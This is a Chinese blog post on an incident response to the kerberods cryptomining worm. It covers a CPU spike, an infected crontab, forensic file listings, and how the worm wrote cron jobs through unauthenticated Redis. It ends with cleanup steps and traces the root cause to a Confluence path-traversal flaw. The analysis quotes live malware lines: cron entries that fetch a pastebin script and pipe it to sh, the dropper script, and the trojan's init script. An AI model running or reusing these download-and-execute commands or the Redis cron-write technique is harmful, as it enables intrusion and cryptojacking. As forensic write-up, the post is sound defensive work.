Redis未授權(quán)訪問及安全組漏洞招致kerberods來挖礦

參考文檔

https://www.freebuf.com/articles/web/94237.html
https://4hou.win/wordpress/?p=7973
https://www.4hou.com/vulnerable/13843.html
https://laucyun.com/17e194c26e4554cab975aae760bad553.html

現(xiàn)象
服務(wù)器CPU飆升
故障時間2019.4.10 17:50
top及htop查看信息只能看到1個cpu信息,默認(rèn)是4個

排錯
排查發(fā)現(xiàn)crontab異常

[root@VM_3_114_centos ~]# crontab -l
*/15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh

先簡單解決問題
重命名curl wget yum等工具,然后停止cron服務(wù),刪除crontab任務(wù)并禁錮cron任務(wù)中root文件,并修改host偽造pastebin.com解析,問題暫時得到了解決

然后分析問題
手工試了下這個腳本的威力,具體的也可以訪問這個網(wǎng)站查看 https://pastebin.com/raw/xmxHzu5P ,這里會木馬啟動文件/usr/sbin/kerberods
后來網(wǎng)上查了下該病毒短時間內(nèi)即造成大量 Linux 主機(jī)淪陷,它的傳播方式分為三種,分別是:

  • 從 known_hosts 文件讀取 IP 列表,用于登錄信任該主機(jī)的其他主機(jī),并控制它們執(zhí)行惡意命令
  • 利用 Redis 未授權(quán)訪問和弱密碼這兩種常見的配置問題進(jìn)行控制它們執(zhí)行惡意命令
  • 利用 SSH 弱密碼進(jìn)行爆破,然后控制它們執(zhí)行惡意命令
[root@VM_3_114_centos tmp]# wgetold -q -O- https://pastebin.com/raw/xmxHzu5P
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

mkdir -p /tmp
chmod 1777 /tmp
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9
apt-get install curl -y||yum install curl -y||apk add curl -y
apt-get install cron -y||yum install crontabs -y||apk add cron -y
systemctl start crond
systemctl start cron
systemctl start crontab
service

查找當(dāng)時哪些文件被修改了

[root@VM_3_114_centos / ]#find ./ -mtime -1 -type f  -exec ls -lt {} \; | grep "17:50"
-rw-r--r-- 1 root root 9216 Apr 10 17:50 ./etc/pki/nssdb/cert9.dbold
-rw-r--r-- 1 root root 11264 Apr 10 17:50 ./etc/pki/nssdb/key4.dbold
-rw-r--r-- 1 root root 35773 Apr 10 17:50 ./etc/ld.so.cache
-rw-r--r-- 1 root root 35773 Apr 10 17:50 ./etc/crond.d/tomcat
-rw-r--r-- 1 root root 17 Apr 10 17:50 ./run/systemd/system/session-460352.scope
-rw-r--r-- 1 root root 17 Apr 10 17:50 ./run/systemd/system/session-460351.scope
-rw------- 1 root root 28903 Apr 10 17:50 ./var/cache/ldconfig/aux-cache
-rw-r--r-- 1 root root 0 Apr 10 17:50 ./var/cache/yum/x86_64/7/timedhosts.txt
-rw-r--r-- 3 root root 6 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/checksum_type
-rw-r--r-- 2 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/from_repo_revision
-rw-r--r-- 1 root root 36 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/var_uuid
-rw-r--r-- 2 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/from_repo_timestamp
-rw-r--r-- 1 root root 87 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/origin_url
-rw-r--r-- 1 root root 64 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/checksum_data
-rw-r--r-- 1 root root 5 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/var_infra
-rw-r--r-- 3 root root 15 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/command_line
-rw-r--r-- 3 root root 6 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/checksum_type
-rw-r--r-- 1 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/from_repo_revision
-rw-r--r-- 1 root root 36 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/var_uuid
-rw-r--r-- 1 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/from_repo_timestamp
-rw-r--r-- 1 root root 97 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/origin_url
-rw-r--r-- 1 root root 64 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/checksum_data
-rw-r--r-- 1 root root 5 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/var_infra
-rw-r--r-- 3 root root 15 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/command_line
-rw-r--r-- 1 root root 7 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/from_repo
-rw-r--r-- 3 root root 6 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/checksum_type
-rw-r--r-- 2 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/from_repo_revision
-rw-r--r-- 1 root root 36 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/var_uuid
-rw-r--r-- 2 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/from_repo_timestamp
-rw-r--r-- 1 root root 90 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/origin_url
-rw-r--r-- 1 root root 64 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/checksum_data
-rw-r--r-- 1 root root 5 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/var_infra
-rw-r--r-- 3 root root 15 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/command_line
-rw-------. 1 root root 896000 Apr 10 17:50 ./var/lib/yum/history/history-2016-04-21.sqlite
-rw-r--r-- 1 root root 3597 Apr 10 17:50 ./var/lib/yum/history/2016-04-21/21/config-main
-rw-r--r-- 1 root root 8391 Apr 10 17:50 ./var/lib/yum/history/2016-04-21/21/config-repos
-rw-r--r-- 1 root root 1722 Apr 10 17:50 ./var/lib/yum/history/2016-04-21/21/saved_tx
-rw-------. 1 root root 33536 Apr 10 17:50 ./var/lib/yum/history/history-2016-04-21.sqlite-journal
-rw-r--r-- 1 root root 45 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/version
-rw-r--r-- 1 root root 2692 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/conflicts
-rw-r--r-- 1 root root 3105 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/obsoletes
-rw-r--r-- 1 root root 60927 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/pkgtups-checksums
-rw-r--r-- 1 root root 23303 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/file-requires
-rw-r--r--. 1 root root 12288 Apr 10 17:50 ./var/lib/rpm/Installtid
-rw-r--r--. 1 root root 2273280 Apr 10 17:50 ./var/lib/rpm/Dirnames
-rw-r--r--. 1 root root 40960 Apr 10 17:50 ./var/lib/rpm/Sigmd5
-rw-r--r--. 1 root root 65536 Apr 10 17:50 ./var/lib/rpm/Sha1header
-rw-r--r--. 1 root root 36864 Apr 10 17:50 ./var/lib/rpm/Name
-rw-r--r--. 1 root root 73367552 Apr 10 17:50 ./var/lib/rpm/Packages
-rw-r--r--. 1 root root 8192 Apr 10 17:50 ./var/lib/rpm/Conflictname
-rw-r--r--. 1 root root 20480 Apr 10 17:50 ./var/lib/rpm/Group
-rw-r--r--. 1 root root 188416 Apr 10 17:50 ./var/lib/rpm/Requirename
-rw-r--r--. 1 root root 1617920 Apr 10 17:50 ./var/lib/rpm/Providename
-rw-r--r--. 1 root root 3084288 Apr 10 17:50 ./var/lib/rpm/Basenames
-rw------- 1 root root 161 Apr 10 17:50 ./var/log/yum.log

發(fā)現(xiàn)問題文件
發(fā)現(xiàn)一個比較可疑的文件,文件當(dāng)時沒用刪除是二進(jìn)程形式,通過xxd能查看,大概如下內(nèi)容,比較奇怪的是redis格式的,而且還有redis版本,后來谷歌發(fā)現(xiàn)redis無密碼確實有被利用的風(fēng)險

[root@VM_3_114_centos / ]#cat /etc/crond.d/tomcat
REDIS 0008%09 redis-ver4.0.6 redis-bits ??used-memq
t??time@Gts????eecˉused-memP
*/15 * * * * root wget -q -O- https://pastebin.com/raw/v5XC0BJh|sh
##
caches@F
*/10 * * * * root curl -fsSL https://pastebin.com/raw/v5XC0BJh|sh
##

利用redis未授權(quán)漏洞復(fù)盤攻擊過程
下面展示利用 Redis 未授權(quán)訪問和弱密碼這兩種常見的配置問題進(jìn)行控制它們執(zhí)行惡意命令

[root@VM_3_114_centos ~]# redis-cli 
127.0.0.1:6379> KEYS *
1) "runtime"
2) "caches"
127.0.0.1:6379> GET runtime
"\n*/15 * * * * wget -q -O- https://pastebin.com/raw/v5XC0BJh|sh\n##\n"
127.0.0.1:6379> get caches
"\n*/10 * * * * curl -fsSL https://pastebin.com/raw/v5XC0BJh|sh\n##\n"
127.0.0.1:6379> 
127.0.0.1:6379> DEL runtime
(integer) 1
127.0.0.1:6379> del caches
(integer) 1
127.0.0.1:6379> KEYS *
(empty list or set)
127.0.0.1:6379> CONFIG GET dir
1) "dir"
2) "/var/spool/cron/crontabs"
127.0.0.1:6379> CONFIG GET dbfilename
1) "dbfilename"
2) "root"

檢查known_host文件
挖礦病毒kerberods會暴力破解known_hosts里面主機(jī)的密碼,還會掃描known_hosts主機(jī)是否對外開通6379端口,要是開放了redis端口可以利用redis遠(yuǎn)程執(zhí)行漏洞,直接ssh免密登陸遠(yuǎn)程服務(wù)器繼續(xù)擴(kuò)散病毒
[root@VM_3_114_centos .ssh]# cat known_hosts

介紹kerberods木馬

  • kerberods木馬啟動程序
[root@VM_3_114_centos init.d]# cat /etc/init.d/netdns 
#! /bin/bash
#chkconfig: - 99 01
#description: kerberods daemon
#processname: /usr/sbin/kerberods
### BEGIN INIT INFO
# Provides:     /user/sbin/kerberods
# Required-Start:
# Required-Stop:
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description: kerberods deamon
# Description:          kerberods deamon
### END INIT INFO

LocalPath="/usr/sbin/kerberods"
name='kerberods'
pid_file="/tmp/.X11unix"
stdout_log="/var/log/$name.log"
stderr_log="/var/log/$name.err"
get_pid(){
    cat "$pid_file"
}
is_running(){
    [ -f "$pid_file" ] &&/usr/sbin/kerberods -Pid $(get_pid) > /dev/null 2>&1
}
case "$1" in
start)
    if is_running; then
        echo "Already started"
    else
        echo "Starting $name"
        $LocalPath >>"$stdout_log" 2>> "$stderr_log" &
        echo $! > "$pid_file"
        if ! is_running; then
        echo "Unable to start, see$stdout_log and $stderr_log"
        exit 1
        fi
    fi
;;
stop)
    if is_running; then
        echo -n "Stopping$name.."
        kill $(get_pid)
        for i in {1..10}
        do
            if ! is_running; then
                break
            fi
            echo -n "."
            sleep 1
        done
        echo
        if is_running; then
            echo "Not stopped; maystill be shutting down or shutdown may have failed"
            exit 1
        else
            echo "Stopped"
            if [ -f "$pid_file"]; then
                rm "$pid_file"
            fi
        fi
    else
        echo "Not running"
    fi
;;
restart)
    $0 stop
    if is_running; then
        echo "Unable to stop, will notattempt to start"
        exit 1
    fi
    $0 start
;;
status)
    if is_running; then
        echo "Running"
    else
        echo "Stopped"
        exit 1
    fi
;;
*)
echo "Usage: $0{start|stop|restart|status}"
exit 1
;;
esac

最后匯總下殺毒步驟及注意事項

  • 刪除木馬及啟動服務(wù)
rm -rf /usr/sbin/kerberods
rm -rf /etc/init.d/netdns
rm -rf /etc/rc.d/rc0.d/K01netdns
rm -rf /etc/rc.d/rc1.d/K01netdns
rm -rf /etc/rc.d/rc2.d/S99netdns
rm -rf /etc/rc.d/rc3.d/S99netdns
rm -rf /etc/rc.d/rc4.d/S99netdns
rm -rf /etc/rc.d/rc5.d/S99netdns
rm -rf /etc/rc.d/rc6.d/K01netdns
rm -rf /etc/systemd/system/multi-user.target.wants/netdns.service
rm -rf /usr/lib/systemd/system/netdns.service
  • 刪除計劃任務(wù)
rm -rf /etc/crond.d/tomcat
> /var/spool/cron/root ;chattr +i root 
> /var/spool/cron/crontabs/root ;chattr +i root 
> /etc/cron.d/root ;chattr +i root

  • redis清空相關(guān)配置及設(shè)置密鑰,不要用root賬號運行redis

  • 修改hosts文件設(shè)置pastebin.com解析

  • 重啟(如果不重啟,有些進(jìn)制駐留到內(nèi)存不能釋放)

  • htop,top等命令還是顯示不了多核心,可以重新部署系統(tǒng)

  • 檢查/root/.ssh/known_hosts里面服務(wù)器是否也有相關(guān)問題

  • 做好安全組云服務(wù)雖然有VPC隔離但是并不安全,如果不限制好安全組其他中毒的服務(wù)器容易攻擊

事后發(fā)現(xiàn)最終原因

情報名稱
Confluence 路徑穿越漏洞安全預(yù)警(CVE-2019-3398)
風(fēng)險等級
嚴(yán)重
情報概述
近日,騰訊云安全中心監(jiān)測到 Confluence官方發(fā)布安全公告,披露了Confluence Server 和 Data Center 產(chǎn)品在 downloadallattachments 資源中存在的一個路徑穿越漏洞,攻擊者可利用該漏洞寫入惡意文件導(dǎo)致代碼執(zhí)行。 為避免您的業(yè)務(wù)受影響,騰訊云安全中心建議您及時開展安全自查,如在受影響范圍,請您及時進(jìn)行更新修復(fù),避免被外部攻擊者入侵

逆向工程
Confluence網(wǎng)站80端口對公網(wǎng)開放,黑客利用漏洞入侵,下載病毒到Confluence服務(wù)器,然后病毒根據(jù).ssh/known_hosts文件掃描服務(wù)器及所在網(wǎng)段redis服務(wù),如果redis服務(wù)為授權(quán)就會有如上redis服務(wù)哪一堆騷操作了,會通過redis把下載并執(zhí)行病毒的操作寫入計劃任務(wù)里。最后就算內(nèi)網(wǎng)沒有redis服務(wù)也會嘗試暴力破解的方式攻擊內(nèi)網(wǎng)服務(wù)器,所以內(nèi)網(wǎng)弱密碼同樣是重災(zāi)區(qū)。云服務(wù)器的安全很重要,要不然病毒會在整個云環(huán)境中蔓延。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 1.應(yīng)用介紹 Redis是一個開源的使用ANSI C語言編寫、支持網(wǎng)絡(luò)、可基于內(nèi)存亦可持久化的日志型、Key-Va...
    BerL1n閱讀 1,947評論 2 4
  • 轉(zhuǎn)自:https://blog.51cto.com/3381847248/2066599 一、ssh詳解 1、什么...
    950545c4cd64閱讀 51,435評論 0 6
  • 最近在看一部臺灣劇,灣灣劇雖然式微,但是好的演員和劇本還是很多,有一種撿珠玉的感覺。相比國內(nèi),動不動就仙俠,動不動...
    星河2017閱讀 725評論 0 0
  • 一凡戰(zhàn)友在元訓(xùn)營二期寫作訓(xùn)練,每天布置的作業(yè)讓大家有話可寫,有點可切入,值得學(xué)習(xí)。 一凡的寫作訓(xùn)練內(nèi)容計劃為: 關(guān)...
    007曾瑞英閱讀 248評論 0 0
  • 思茶念茶 2017-07-23 一人的時候,喜歡泡一杯清茶,快速敲敲建盤,手腕累時端起茶杯,看看杯中那沉浮的茶葉,...
    獨行狹女閱讀 404評論 0 0

友情鏈接更多精彩內(nèi)容